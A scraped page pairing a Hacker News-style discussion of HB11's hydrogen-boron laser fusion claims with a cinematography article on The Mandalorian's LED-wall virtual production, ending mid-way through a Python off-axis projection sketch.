I expect that the engineering is harder, because scale can bring efficiencies. But still, I think the winner is going to be a small device, not a behemoth, if only because a small device can come online years earlier.

naiveprogrammer(10000) 4 days ago [-]

I don't know whether this is a legit breakthrough. But technological progress often follows a sigmoid (S-shaped) growth curve: it may take a while to get past certain steps, but once you are through, money flows and more people devote time to the technology, which accelerates the process. It is not hard to imagine that, say, 20 years from now, we have power plants running on fusion, given the interest we have in solving the climate crisis.
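For concreteness, the standard logistic form of such an S-curve, with L the saturation level, k the growth rate, and t_0 the midpoint:

$$f(t) = \frac{L}{1 + e^{-k(t - t_0)}}$$

Adoption looks exponential early on, then flattens as it approaches L.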

wtracy(3624) 4 days ago [-]

> The fifth step is to attach it to power generating equipment

The part that jumped out at me as strange is that they claim their process generates electricity 'directly' without having to drive a turbine. Supposedly they produce helium cations, and that can drive a circuit.

Can anybody comment on whether that makes sense?

ChuckMcM(537) 4 days ago [-]

Spot on analysis. There is one loophole which is Total Cost of Ownership (TCO).

If your energy production solution can achieve a lower TCO in an existing market segment, steps six and seven (production and supply chain) take care of themselves. The poster child for this was 'on premise PV generation.'

Once a nuclear technology demonstrates a lower TCO for baseline power generation, it's game on.

tinco(4196) 4 days ago [-]

Off-topic question: is there some software part in nuclear energy systems that is restricting plants or research? I'd like to contribute to the industry as a non-physicist, but it's hard for me to imagine what kind of software might be missing or is being sold by too expensive specialist companies.

I imagine most software is tied to the specific devices they run on, but perhaps there's coupling or analytical software that could be better geared towards the problem domain. Is there any fundamental issue that is waiting for a good software solution?

throwaway010718(10000) 4 days ago [-]

> because it makes less radiologically hazardous material

Why is there any radioactive material produced by a fusion reactor?

JoeAltmaier(10000) 4 days ago [-]

Why a pellet? Why not a gas of boron and hydrogen? Easier to feed continuously.

grogers(4192) 3 days ago [-]

The paper says the fuel is a low energy plasma of 'solid state density'. It's not a solid chunk of HB11, which AFAIK doesn't exist. The primary factor limiting the feed is the repetition rate of the laser.

kamesstory(10000) 4 days ago [-]

It probably has to do with density, if the target is cascading reactions via nucleus-to-nucleus contact. Solids have a higher chance of contact.

tartoran(1883) 4 days ago [-]

This proves once again what can happen when one doesn't follow the herd.

melling(1183) 4 days ago [-]

"He called this in the 70s, he said this would be possible. It's only possible now because these brand new lasers are capable of doing it."

He knew it would work 50 years ago.

I imagine there are ideas being discussed today that will come to fruition 50 years from now.

... or 30 years. Our choice.

wokkel(10000) 4 days ago [-]

What I find disturbing is that when I start looking for other sources, Google gives me a news item at https://newsroom.unsw.edu.au/news/science-tech/pioneering-te... but there the article has been retracted? Also another one that seems to be behind a paywall (I cannot tell, as the paywall is broken). So I have one story on one website, plus the company website itself. The news site claims on its about page that it values old-school journalistic values (I assume they mean they investigate a story before publishing), but it's hard to take that claim seriously without more credible sources. For me this is interesting technology to keep an eye on, but without more confirmation and research, this is cold fusion for now.

DennisP(3581) 4 days ago [-]

For credible sources, look at their publications in scientific journals. They might be wrong, but this is nothing like cold fusion.

yufeng66(10000) 4 days ago [-]

There is a warning sign. Without actually running the numbers, I believe the energy generated by the proposed HB11 fusion should be several orders of magnitude higher than the electric energy the alpha particles can carry. So extremely hot temperatures will be created regardless.

Edit: actually read the paper :) From the paper: H + 11B → 3 × 4He + 8.7 MeV

When an alpha particle absorbs electrons to become helium, it can carry about 50 eV of energy. So the vast majority of the energy generated will be kinetic or photon energy, which translates into very hot temperatures at the macro level.
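Quantifying that mismatch under the comment's own figures:

$$\frac{8.7\ \text{MeV}}{\sim 50\ \text{eV}} = \frac{8.7\times 10^{6}}{50} \approx 1.7\times 10^{5},$$

which is the 'several orders of magnitude' being referred to.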

steerablesafe(10000) 4 days ago [-]

I think the idea is to capture the kinetic energy of the helium ions not through cooling but by slowing them down electromagnetically. The high-speed helium ions carry a large current; it's not about the ionization energy.

bbojan(10000) 4 days ago [-]

Actually, converting kinetic energy of fast moving ions to electricity is a very efficient process. See https://en.wikipedia.org/wiki/Direct_energy_conversion.

danmaz74(2552) 4 days ago [-]

I suppose the idea is that most of the energy will be expelled as kinetic energy of the alpha particles, that then can be converted into electric potential energy?

phkahler(4177) 4 days ago [-]

Yeah, I thought the electrical output seemed fishy too. Why are the electrons stripped from the helium? And is that actually due to the energy of the fusion reaction? And how much of the fusion energy is left after?

These are IMO the fundamental questions.

skykooler(10000) 4 days ago [-]

Much of the difficulty with fusion is getting the fuel to the temperatures needed to sustain fusion - so that's actually a good thing.

londons_explore(4296) 4 days ago [-]

The whole 'electrical energy directly so no steam generators necessary' part of the discussion is fairly irrelevant.

Steam generators might have fairly low efficiency, but if hydrogen fusion works at all it'll use so little fuel and have such a low marginal cost that we can just do more of it to make up for any efficiency losses.

TomMarius(10000) 4 days ago [-]

My nuclear fusion physicist friend is very sceptical.

throwaway9d0291(10000) 4 days ago [-]

On its own, this isn't a very substantial comment. Can you elaborate on why your friend is sceptical and what effort they put in to come to that conclusion?

crusso(10000) 4 days ago [-]

Here's a video explaining the reaction: https://www.youtube.com/watch?v=Dy0kHQASsX8

dctoedt(422) 4 days ago [-]

Upvoted — the first minute or so of the video is very helpful; it shows (what looks like) PowerPoint slides with drawings of a proton (1H nucleus) hitting a boron nucleus (5B11); the proton fuses into the boron nucleus to create what presumably is a single carbon nucleus (6C12), which then splits into three helium nuclei (each 2He4) without emitting free neutrons.

(The very-crude video technique was fascinating to this non-artistic person: Create PowerPoint slides, add subtitles for 'narration' that float in and out, and finally add stock music for background. That might be useful for flipped-classroom courses.)

pier25(2674) 4 days ago [-]

Is fusion capable of replacing all our energy systems?

If it works, is it the energy miracle humanity needs?

LaMarseillaise(10000) 4 days ago [-]

1. Yes.

2. No, because we already have fission reactors. How many miracles do we need?

acidburnNSA(3665) 4 days ago [-]

There certainly is enough fusion fuel on earth to power humanity at 10 or 100x current consumption until the sun explodes without emitting any CO2.

Same can be said for fission, but it only powers 5% of the world due to what can be called complications (even though many scientists insist that it's safe and responsible).

Fusion is expected to have fewer complications, but we won't know until we scale up a fleet of fusion power plants and understand all the nuance.

How's that for an answer?

1958325146(10000) 4 days ago [-]

I am just learning about this reaction, but can anyone explain what is wrong with the following naive idea?

- Fire a stream of hydrogen ions from a particle accelerator at a chunk of boron-11.

- The hydrogen and boron combine and release heat and helium.

- Use the heat from that to run a turbine and keep running your particle accelerator.

It seems like you would end up with a lower-energy collection of atoms. Does that work but it is just not efficient enough to keep running the accelerator, or what?

Accujack(10000) 4 days ago [-]

>fire a stream of hydrogen ions with a particle accelerator at a chunk of Boron 11.

This is what's wrong. The energy required to accelerate the ions is much higher than the energy which can be harvested this way.

The concept under discussion substitutes a simpler setup that accelerates particles using laser induced plasmas from a very small table top laser. The thing could 'almost' be battery powered.

sam(3646) 4 days ago [-]

The problem with firing a stream of hydrogen ions at a chunk of Boron 11 is that most of the collisions between the hydrogen and the Boron are glancing blows that will dissipate the energy very quickly. Only a small fraction of the collisions result in a fusion reaction.

This is the reason why most fusion approaches rely on thermal systems. In a thermal system, the ions have a bell-shaped distribution of energies and undergo many collisions before they leave the region in which they are confined and their energy leaves the system.

To achieve net gain, the temperature, density and energy confinement time must be above a certain threshold. If the system is non thermal, like a stream of hydrogen ions where the distribution of energies is a spike, the energy in the hydrogen ions that are deflected by glancing blows must be recaptured somehow.

willis936(10000) 4 days ago [-]

27 comments and not one hit of the word "inertial"! The line about not being thermonuclear and the description of the device in question (a sphere with lasers) points towards an inertial confinement fusion (ICF) device. Most of the fusion research eggs are in the thermonuclear basket, specifically magnetic confinement fusion. It is good to research a diverse set of approaches, but there are more engineering challenges to ICF reactors than there are to MCF reactors. Pulses on the order of 1-2 Hz require a mechanical system that can cycle out the exhaust and replace the pellet in that time. Going to reactor scales also requires high load thermal cycles. MCF ain't easy, and brings its own engineering challenges. The ones I always hear are things like wall materials and fuel recycling, but these are largely solved or in the process of being solved. The engineering challenges I see as the most difficult for MCF are related to steady-state operation. Tokamaks have no way of being steady state. Stellarators do, but then the next problem is wall conditioning. Wall materials outgas in hot plasma. A lot. Like more than the fuel puffed in. The way this is handled in science machines is with glow discharges of various species: plasma just below the temperature that causes wall sputtering, coating the wall with carbon and boron for their absorptive properties, etc. No one's run a steady state hot plasma before, so no one knows if these will be a non-issue in reactors. Keeping the plasma clean may be a challenge to keep the plasma from terminating. Aside from that MCF is ready for prime time. It needs a big reactor for scaling laws to make it energy profitable (and potentially money profitable). We just need some very expensive test reactors to smooth out these issues.

derefr(3783) 4 days ago [-]

Complete layman to this, but are these approaches fundamentally incompatible with one-another, or is it just that each one on its own seems to be "enough" to get a reactor to work? Could you have a reactor that just combines all these confinement approaches at once?

pxhb(10000) 4 days ago [-]

One reason you might not find 'inertial' is because the only thing they have in common is a laser.

For ICF, a long-pulse laser is used like a hammer to heat and compress the material to fusion conditions.

This scheme, as far as I can tell, uses the large EM fields of a short-pulse laser to accelerate a 'beam' of ions into cold material to induce fusion.

anonsivalley652(4125) 4 days ago [-]

It seems easy to dismiss any or all approaches as fringe when no one's done it yet, especially if there are political and program-$ecurity concerns overriding doing what's best, but some approaches scream magical thinking with unexplained reasoning more than others (like one or more cold fusion proposals in the early 1980's). OTOH, it seems like ICF and tokamak are the officially-sanctioned dogma and all other approaches are discounted automatically.

Q0: Without bias from my opinion, how fringe or potentially legitimate does IEC seem?

Q1: Props to the article's team for inventing some awesome lasers. Is there enough experimental data yet on their novel approach to back up their claims and justify funding a prototype? Would such a team be able to test this on a shoestring budget without spending millions?

LargoLasskhyfv(10000) 3 days ago [-]

As an absolute dummy I had to think of ASML, where they repeatedly hit molten tin droplets in flight with CO2 lasers to produce a plasma, to get extreme ultraviolet light out of it. 50,000 times per second. So the ability to hit something very small in flight, in a vacuum, precisely and repeatedly already exists on an industrial scale. Though not simple, small or cheap. Should ask Cymer or Trumpf, who do this. And forget about all that unnecessary light-generating stuff, just rip out the necessary parts and adapt them for this application. And of course harden it against the FUSION happening. Simple, isn't it?

(stupid grin)

Dumblydorr(10000) 4 days ago [-]

Just a writing critique. I think your post could use paragraph breaks, it's hard to discern the logical structure without breaks.

missosoup(4187) 4 days ago [-]

So is there a way to invest in this?

DennisP(3581) 4 days ago [-]

It's a private company in Australia that likely needs more funding, so probably so, if you meet your government's requirements for investing in that sort of thing.

RandomWorker(4302) 4 days ago [-]

Google 'polywell'; the US military has been funding this for the past 20 years. There are some issues that might be solved by scaling the device. A company called EMC2 was spun off from this US military project.

DennisP(3581) 4 days ago [-]

Polywell is a completely different method.

cfv(4320) 4 days ago [-]

On paper, this sounds absolutely awesome and a huge game changer.

I'm super concerned about the military applications, though. Giving functionally endless, mostly free power to warmongering countries with the ability to field drones is extremely concerning to me.

foobiekr(10000) 4 days ago [-]

They basically already have endless, mostly free power in the sense you are getting at. That it isn't clean is irrelevant to their use case.

The militaries of China, Iran, the United States, etc. are not hurting for energy and already make heavy use of small nuclear reactors where just hauling fuel is not an easier choice.

detritus(10000) 4 days ago [-]

This seems.. too good to be true?

I don't have the Physics chops to untangle the likelihood of this tech and the credibility of the process and its authors, so I'm hoping the HN crowd will be able to pad out the story behind this.

Certainly, from my layperson's perspective, their website isn't exactly encouraging... https://www.hb11.energy/

- ed re: last line - 'books and covers, and all that'

saagarjha(10000) 4 days ago [-]

Not a physicist, but I thought it seemed fishy as well. I'm curious how they plan to sustain a reaction, since their setup didn't seem to be useful for more than a single shot...

superkuh(4122) 4 days ago [-]

After reading the article and skimming some of the innumerable references (the article is all references), it seems like the unobtainium part of using laser ponderomotive force to accelerate blocks of high-density plasma from the solid state is that the laser 'contrast ratio' has to be very high. The paper cites many failed efforts to replicate this particular use of laser ponderomotive force due to insufficient 'contrast ratio'.

I have no idea what 'contrast ratio' means; it isn't defined, and isn't in the references. Does anyone know what 'contrast ratio' means in terms of high power pulsed lasers?

edit: To answer my own question, ref: https://cdn.intechweb.org/pdfs/24813.pdf

> the laser pulse contrast ratio (LPCR) is a crucial parameter to take into consideration. Considering the laser pulse intensity temporal profile, the LPCR is the ratio between its maximum (peak intensity) and any fixed delay before it. A low contrast ratio can greatly modify the dynamics of energy coupling between the laser pulse and the initial target by producing a pre-plasma that can change the interaction mechanism.

It seems to be how fast the laser turns on, the rate of change of intensity.
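In symbols, with I(t) the pulse intensity profile and t_p the time of peak intensity, the quoted definition amounts to

$$\text{LPCR}(\Delta t) = \frac{I(t_p)}{I(t_p - \Delta t)},$$

so a low ratio means a pedestal or prepulse arrives early enough to form a pre-plasma before the main pulse hits the target.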

randallsquared(3822) 4 days ago [-]

The Hydrogen Boron reaction is real and well-known to be a way to do fusion without lots of stray neutrons. The sticking point has always been that it's more difficult to cause that reaction than deuterium/tritium or deuterium/deuterium.

DennisP(3581) 4 days ago [-]

Check the publications page for the encouraging part. They might be wrong but they're doing real science. I've personally spoken to a fusion scientist who thought they might be on to something.

Exponential progress does sometimes have results that seem too good to be true. In this case the progress has been in picosecond lasers, which for a while have been getting ten times more powerful every three years or so.

What's great about this is it should be pretty cheap to test. The petawatt lasers only cost tens of millions in the first place, and China is finishing up a 30PW laser which they plan to let other researchers use. If Hora is right then that should be powerful enough. Even more powerful lasers are being planned elsewhere.

HB11 isn't the only company working on aneutronic fusion. The largest is TAE (formerly Tri Alpha), with about $700 million invested. There's also Helion and LPP.

moneytide1(10000) 4 days ago [-]

Yeah I've become wary of 'scientific breakthrough' articles that never seem to materialize into anything.

But ITER uses huge tower cranes and trucks to move the thousands of tons of material required to sustain a temperature hotter than the surface of the Sun, because of its fuel selection.

It seems a small player with a new approach, one that perhaps demands less complexity in a scaled-up commercial reactor, could win a commissioning contract with a lower bid during international bidding in the late 2020s or early 2030s.

'First milestone is demonstrating the reactions, which should be easy.'

And 'chirped pulse laser amplification' is the recent discovery Hora says will make it possible.

Accujack(10000) 4 days ago [-]

Do a google search for 'laser induced fission'. Generating plasmas with CPA lasers is becoming more common, but isn't widespread yet because the technology is very new.

These plasmas can be the source for all kinds of particles and energy in particular forms, so they may have lots and lots of uses.

One person in particular is proposing to use a CPA laser to accelerate nuclear decay, to allow radioactive waste to decay faster and become less toxic more quickly.

Of course, my own concern would be that being able to induce fission with a table top laser means that the tech may eventually exist to create a fission or fusion bomb without a nuclear trigger....

jabl(10000) 4 days ago [-]

The big problem with H-B11 and other heavier fusion processes is that the energy radiated away as bremsstrahlung is greater than the energy gained from the fusion. This was worked out by Todd Rider in his 1995 PhD thesis.

Yeah, in theory it might be possible to capture the bremsstrahlung and pump it back into the reactor with sufficiently high efficiency, but we're pretty far away from that.

That being said, all these fancy fusion reactor schemes are interesting. Just make them work on boring old D-T fuel first, then let's see if these other fuels are usable, no?

moron4hire(3507) 4 days ago [-]

I don't know. I think a really flashy website would be more concerning. This is a serviceable website that gets its point across without consuming a gig of bandwidth on a video in the header background.

pxhb(10000) 4 days ago [-]

I can't tell for sure from the article but I think they are accelerating protons with TNSA (target normal sheath acceleration). I worked in a lab in undergrad that was doing something similar, except with lithium instead of boron. The main challenges that I recall from a decade ago with TNSA are (WARNING: there almost certainly has been progress since a decade ago):

-Conversion efficiency of laser energy into ion (proton) kinetic energy

-TNSA mainly accelerates the contaminant layer on the back of targets, which may not be a big deal if you are interested in accelerating protons

-TNSA protons are not beam-like. They do not have a uniform kinetic energy, and they have a wide angular divergence.

-Various laser related issues (prepulse, focal spot size/shape).

I also anticipate that it will have the same engineering problem as ICF/NIF, in that it will need to continuously replenish targets.





Historical Discussions: Real-time, in-camera background compositing in The Mandalorian (February 20, 2020: 753 points)
Virtual Cinematography for the Mandalorian, Using Unreal (February 09, 2020: 1 points)

(753) Real-time, in-camera background compositing in The Mandalorian

753 points 5 days ago by ashin in 4119th position

ascmag.com | Estimated reading time – 44 minutes | comments | anchor

Cinematographers Greig Fraser, ASC, ACS and Barry "Baz" Idoine and showrunner Jon Favreau employ new technologies to frame the Disney Plus Star Wars series.

Unit photography by François Duhamel, SMPSP, and Melinda Sue Gordon, SMPSP, courtesy of Lucasfilm, Ltd.

At top, the Mandalorian Bounty Hunter (played by Pedro Pascal) rescues the Child — popularly described as 'baby Yoda.'

This article is an expanded version of the story that appears in our February, 2020 print magazine.

A live-action Star Wars television series was George Lucas' dream for many years, but the logistics of television production made achieving the necessary scope and scale seem inconceivable. Star Wars fans would expect exotic, picturesque locations, but it simply wasn't plausible to take a crew to the deserts of Tunisia or the salt flats of Bolivia on a short schedule and limited budget. The creative team behind The Mandalorian has solved that problem.

For decades, green- and bluescreen compositing was the go-to solution for bringing fantastic environments and actors together on the screen. (Industrial Light & Magic did pioneering work with the technology for the original Star Wars movie.) However, when characters are wearing highly reflective costumes, as is the case with Mando (Pedro Pascal), the title character of The Mandalorian, the reflection of green- and bluescreen in the wardrobe causes costly problems in post-production. In addition, it's challenging for actors to perform in a "sea of blue," and for key creatives to have input on shot designs and composition.

This story was originally published in the Feb. 2020 issue of AC. Some images are additional or alternate.

In order for The Mandalorian to work, technology had to advance enough that the epic worlds of Star Wars could be rendered on an affordable scale by a team whose actual production footprint would comprise a few soundstages and a small backlot. An additional consideration was that the typical visual-effects workflow runs concurrent with production, and then extends for a lengthy post period. Even with all the power of contemporary digital visual-effects techniques and billions of computations per second, the process can take up to 12 hours or more per frame. With thousands of shots and multiple iterations, this becomes a time-consuming endeavor. The Holy Grail of visual effects — and a necessity for The Mandalorian, according to co-cinematographer and co-producer Greig Fraser, ASC, ACS — was the ability to do real-time, in-camera compositing on set.

"That was our goal," says Fraser, who had previously explored the Star Wars galaxy while shooting Rogue One: A Star Wars Story (AC Feb. '17). "We wanted to create an environment that was conducive not just to giving a composition line-up to the effects, but to actually capturing them in real time, photo-real and in-camera, so that the actors were in that environment in the right lighting — all at the moment of photography."

The solution was what might be described as the heir to rear projection — a dynamic, real-time, photo-real background played back on a massive LED video wall and ceiling, which not only provided the pixel-accurate representation of exotic background content, but was also rendered with correct camera positional data.

Mando with the Child on his ship.

If the content was created in advance of the shoot, then photographing actors, props and set pieces in front of this wall could create final in-camera visual effects — or "near" finals, with only technical fixes required, and with complete creative confidence in the composition and look of the shots. On The Mandalorian, this space was dubbed "the Volume." (Technically, a "volume" is any space defined by motion-capture technology.)

This concept was initially proposed by Kim Libreri of Epic Games while he was at Lucasfilm, and it has become the basis of the technology, that "Holy Grail," that makes a live-action Star Wars television series possible.

In 2014, as Rogue One was ramping up, the concept of real-time compositing was once again discussed; technology had matured to a new level. Visual-effects supervisor John Knoll had an early discussion with Fraser about the concept, and the cinematographer brought up the notion of using a large LED screen as a lighting instrument: playing back rough previsualized effects on the screen to throw interactive, animated lighting onto the actors and sets during composite photography. The final animated VFX would be added in later; the screens were merely to provide interactive lighting to match the animations.

"One of the big problems of shooting blue- and greenscreen composite photography is the interactive lighting," offers Fraser. "Often, you're shooting real photography elements before the backgrounds are created and you're imagining what the interactive lighting will do — and then you have to hope that what you've done on set will match what happens in post much later on. If the director changes the backgrounds in post, then the lighting isn't going to match and the final shot will feel false."

Director and executive producer Dave Filoni and cinematographers Greig Fraser, ASC, ACS (center) and Barry "Baz" Idoine (operating camera) on the set.

For Rogue One, they built a large cylindrical LED screen and created all of the backgrounds in advance: the space-battle landings on Scarif, Jedha and Eadu, and all the cockpit sequences in X-Wing and U-Wing spacecraft, were shot in front of that LED wall, which served as the primary source of illumination on the characters and sets. Those LED panels had a pixel pitch of 9mm (the distance between the centers of the RGB pixel clusters on the screen). Unfortunately, at that pitch they could rarely get the screen far enough away from the camera to avoid moiré and make the image appear photo-real, so it was used purely for lighting purposes. However, because the replacement backgrounds were already built and used on set, the comps were extremely successful and perfectly matched the dynamic lighting.

In 2016, Lucasfilm president Kathleen Kennedy approached writer/director Jon Favreau about a potential project.

A fisheye view looking through the gap between the two back walls of the show's LED-wall system, known as "the Volume." The dark spot on the Volume ceiling is due to a different model of LED screens used there. The ceiling is mostly used for lighting purposes, and if seen on camera is replaced in post.

"I went to see Jon and ask him if we would like to do something for Disney's new streaming service," Kennedy says. "I've known that Jon has wanted to do a Star Wars project for a long time, so we started talking right away about what he could do that would push technology and that led to a whole conversation around what could change the production path; what could actually create a way in which we could make things differently?"

Favreau had just completed The Jungle Book and was embarking on The Lion King for Disney — both visual-effects heavy films.

Visual effects supervisor Richard Bluff and executive creative director and head of ILM Rob Bredow showed Favreau a number of tests that ILM had conducted, including the LED-wall technology from Rogue One. Fraser suggested that, with the advancements in LED technology since Rogue One, this project could leverage new panels and push the envelope on real-time, in-camera visual effects. Favreau loved the concept and decided that was the production path to take.

In the background, appearing to float in space, are the motion-tracking cameras peeking between the Volume's wall and ceiling.

The production was looking to minimize the amount of green- and bluescreen photography and requirements of post compositing to improve the quality of the environment for the actors. The LED screen provides a convincing facsimile of a real set/location and avoids the green void that can be challenging for performers.

"I was very encouraged by my experiences using similar technology on Jungle Book [AC, May '16], and using virtual cameras on The Lion King [AC, Aug. '19]," explains Favreau, series creator and executive producer. "I had also experimented with a partial video wall for the pilot episode of The Orville. With the team we had assembled between our crew, ILM, Magnopus, Epic Games, Profile Studios and Lux Machina, I felt that we had a very good chance at a positive outcome."

"The Volume is a difficult technology to understand until you stand there in front of the 'projection' on the LED screen, put an actor in front of it, and move the camera around," Fraser says. "It's hard to grasp. It's not really rear projection; it's not a TransLite because [it is a real-time, interactive image with 3D objects] and has the proper parallax; and it's photo-real, not animated, but it is generated through a gaming engine."

Idoine (left) shooting on the Volume's display of the ice-planet Maldo Kreis — one of many of the production's environment "loads" — with director Filoni watching and Karina Silva operating B camera. The fixtures with white, half-dome, ping-pong-style balls on each camera are the "Sputniks" — infrared-marker configurations that are seen by the motion-tracking cameras to record the production camera's position in 3D space, and to render proper 3D parallax on the Volume wall.

"The technology that we were able to innovate on The Mandalorian would not have been possible had we not developed technologies around the challenges of Jungle Book and Lion King," offers Favreau. "We had used game-engine and motion-capture [technology] and real-time set extension that had to be rendered after the fact, so real-time render was a natural extension of this approach."

Barry "Baz" Idoine, who worked with Fraser for several years as a camera operator and second-unit cinematographer on features including Rogue One and Vice (AC Jan. '19), assumed cinematography duties on The Mandalorian when Fraser stepped away to shoot Denis Villeneuve's Dune. Idoine observes, "The strong initial value is that you're not shooting in a green-screen world and trying to emulate the light that will be comped in later — you're actually shooting finished product shots. It gives the control of cinematography back to the cinematographer."

The Volume was a curved, 20'-high-by-180'-circumference LED video wall comprising 1,326 individual LED screens of a 2.84mm pixel pitch, which created a 270-degree arc of background around a 75'-diameter performance space, topped with an LED video ceiling set directly onto the main curve of the LED wall.
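As a quick sketch, the published dimensions are roughly self-consistent, and the pitch implies the wall's physical pixel count (Python, using only figures quoted in the article; the note in the final comment is an inference, not from the article):

    import math

    # Consistency check of the Volume's published dimensions.
    diameter_ft = 75
    arc_deg = 270
    arc_len_ft = math.pi * diameter_ft * (arc_deg / 360)
    print(f"270-degree arc length: {arc_len_ft:.1f} ft")   # ~176.7 ft vs the quoted 180'

    # Physical pixel columns across the wall at a 2.84 mm pitch:
    arc_len_mm = arc_len_ft * 304.8
    print(f"~{arc_len_mm / 2.84:,.0f} pixel columns")      # ~19,000 -- more than the
    # 12,288-wide image later said to be served to the wall, so (inference)
    # the rendered image is evidently scaled up onto the panels.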

At the rear of the Volume, in the 90 remaining degrees of open area, essentially "behind camera," were two 18'-high-by-20'-wide flat panels of 132 more LED screens. These two panels were rigged to traveler track and chain motors in the stage's perms, so the walls could be moved into place or flown out of the way to allow better access to the Volume area.

"The Volume allows us to bring many different environments under one roof," says visual-effects supervisor Richard Bluff of ILM. "We could be shooting on the lava flats of Nevarro in the morning and in the deserts of Tatooine in the afternoon. Of course, there are practical considerations to switching over environments, but we [typically did] two environments in one day."

The crew surrounds the Mandalorian's spacecraft Razor Crest. Only the fuselage and cockpit are practical set pieces. From this still-camera position, the composition appears "broken," but from the production camera's perspective, the engines appear in perfect relationship to the fuselage, and track in parallax with the camera's movement.

"A majority of the shots were done completely in camera," Favreau adds. "And in cases where we didn't get to final pixel, the postproduction process was shortened significantly because we had already made creative choices based on what we had seen in front of us. Postproduction was mostly refining creative choices that we were not able to finalize on the set in a way that we deemed photo-real."

With traditional rear projection (and front projection), in order for the result to look believable, the camera must either remain stationary or move along a preprogrammed path to match the perspective of the projected image. In either case, the camera's center of perspective (the entrance pupil of the lens, sometimes referred to — though incorrectly — as the nodal point) must be precisely aligned with the projection system to achieve proper perspective and the effects of parallax. The Mandalorian is hardly the first production to incorporate an image-projection system for in-camera compositing, but what sets its technique apart is its ability to facilitate a moving camera.

In the pilot episode, the Mandalorian (Pedro Pascal) brings his prey (Horatio Sanz) into custody.

Indeed, using a stationary camera or one locked into a pre-set move for all of the work in the Volume was simply not acceptable for the needs of this particular production. The team therefore had to find a way to track the camera's position and movement in real-world space, and extrapolate proper perspective and parallax on the screen as the camera moved. This required incorporating motion-capture technology and a videogame engine — Epic Games' Unreal Engine — that would generate proper 3D parallax perspective in real time.

The locations depicted on the LED wall were initially modeled in rough form by visual-effects artists creating 3D models in Maya, to the specs determined by production designer Andrew Jones and visual consultant Doug Chiang. Then, wherever possible, a photogrammetry team would head to an actual location and create a 3D photographic scan.

"We realized pretty early on that the best way to get photo-real content on the screen was to photograph something," attests Visual Effects Supervisor Richard Bluff.

As amazing and advanced as the Unreal Engine's capabilities were, rendering fully virtual polygons on-the-fly didn't produce the photo-real result that the filmmakers demanded. In short, 3-D computer-rendered sets and environments were not photo-realistic enough to be utilized as in-camera final images. The best technique was to create the sets virtually, but then incorporate photographs of real-world objects, textures and locations and map those images onto the 3-D virtual objects. This technique is commonly known as tiling or photogrammetry. This is not necessarily a unique or new technique, but the incorporation of photogrammetry elements achieved the goal of creating in-camera finals.

The Mandolorian makes repairs with a rich landscape displayed behind him.

Additionally, photographic "scanning" of a location, which incorporates taking thousands of photographs from many different viewpoints to generate a 3-D photographic model, is a key component in creating the virtual environments.

Enrico Damm became the Environment Supervisor for the production and led the scanning and photogrammetry team that would travel to locations such as Iceland and Utah to shoot elements for the Star Wars planets.

The perfect weather condition for these photographic captures is a heavily overcast day, as there are little to no shadows on the landscape. A situation with harsh sunlight and hard shadows means that it cannot easily be re-lit in the virtual world. In those cases, software such as Agisoft De-Lighter was used to analyze the photographs for lighting and remove shadows to result in a more neutral canvas for virtual lighting.

Scanning is a faster, looser process than photogrammetry and it is done from multiple positions and viewpoints. For scanning, the more parallax introduced, the better the software can resolve the 3-D geometry. Damm created a custom rig where the scanner straps six cameras to their body which all fire simultaneously as the scanner moves about the location. This allows them to gather six times the images in the same amount of time — about 1,800 on average.

Photogrammetry is used to create virtual backdrops, and its images must be shot on a nodal rig to eliminate parallax between the photos. For The Mandalorian, about 30-40 percent of the Volume's backdrops were photogrammetry-based.

Each phase of photography — photogrammetry and scanning — needs to be done at various times during the day to capture different looks to the landscape.

Lidar scanning systems are sometimes also employed.

The cameras used for scanning were Canon EOS 5D MKIV and EOS 5DS with prime lenses. Zooms are sometimes incorporated as modern stitching software has gotten better about solving multiple images from different focal lengths.

The Mandalorian (aka "Mando," played by Pedro Pascal) treks through the desert alone.

This information was mapped onto 3D virtual sets and then modified or embellished as necessary to adhere to the Star Wars design aesthetic. If there wasn't a real-world location to photograph, the environments were created entirely by ILM's "environments" visual-effects team. The elements of the locations were loaded into the Unreal Engine video game platform, which provided a live, real-time, 3D environment that could react to the camera's position.

The third shot of Season 1's first episode demonstrates this technology with extreme effectiveness. The shot starts with a low angle of Mando reading a sensor on the icy planet of Maldo Kreis; he stands on a long walkway that stretches out to a series of structures on the horizon. The skies are full of dark clouds, and a light snow swirls around. Mando walks along the trail toward the structures, and the camera booms up.

All of this was captured in the Volume, in-camera and in real time. Part of the walkway was a real, practical set, but the rest of the world was the virtual image on the LED screen, and the parallax as the camera boomed up matched perfectly with the real set. The effect of this system is seamless.

Because of the enormous amount of processing power needed to create this kind of imagery, the full 180' screen and ceiling could not be rendered high-resolution, photo-real in real time. The compromise was to enter the specific lens used on the camera into the system, so that it rendered a photo-real, high-resolution image based on the camera's specific field of view at that given moment, while the rest of the screen displayed a lower-resolution image that was still effective for interactive lighting and reflections on the talent, props and physical sets. (The simpler polygon count facilitated faster rendering times.)

Idoine (far left) discusses a shot of "the Child" (aka "Baby Yoda") with director Rick Famuyiwa (third from left) and series creator/executive producer Jon Favreau (third from right), while assistant director Kim Richards (second from right, standing) and crewmembers listen. Practical set design was often used in front of the LED screen, and was designed to visually bridge the gap between the real and virtual space. The practical sets were frequently placed on risers to lift the floor and better hide the seam of the LED wall and stage floor.

Each Volume load was put into the Unreal Engine video game platform, which provided the live, real-time, 3D environment that reacted to the production camera's position — which was tracked by Profile Studios' motion-capture system via infrared (IR) cameras surrounding the top of the LED walls that monitored the IR markers mounted to the production camera. When the system recognized the X, Y, Z position of the camera, it then rendered proper 3D parallax for the camera's position in real time. That was fed from Profile into ILM's proprietary StageCraft software, which managed and recorded the information and full production workflow as it, in turn, fed the images into the Unreal Engine. The images were then output to the screens with the assistance of the Lux Machina team.
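The article doesn't detail StageCraft's internals, but the textbook math for rendering correct parallax on a fixed screen from a tracked camera is the "generalized" off-axis perspective projection familiar from CAVE-style displays. Below is a minimal sketch of that calculation; the wall corners, camera position and near-plane value are made-up figures for illustration:

    import numpy as np

    def off_axis_frustum(pa, pb, pc, pe, near):
        """pa, pb, pc: screen lower-left, lower-right, upper-left corners
        (world space); pe: tracked camera position. Returns the asymmetric
        (l, r, b, t) frustum bounds at the near plane."""
        vr = (pb - pa) / np.linalg.norm(pb - pa)   # screen right axis
        vu = (pc - pa) / np.linalg.norm(pc - pa)   # screen up axis
        vn = np.cross(vr, vu)                      # screen normal, toward viewer
        vn /= np.linalg.norm(vn)

        va, vb, vc = pa - pe, pb - pe, pc - pe     # camera -> corner vectors
        d = -np.dot(va, vn)                        # camera-to-screen distance
        l = np.dot(vr, va) * near / d
        r = np.dot(vr, vb) * near / d
        b = np.dot(vu, va) * near / d
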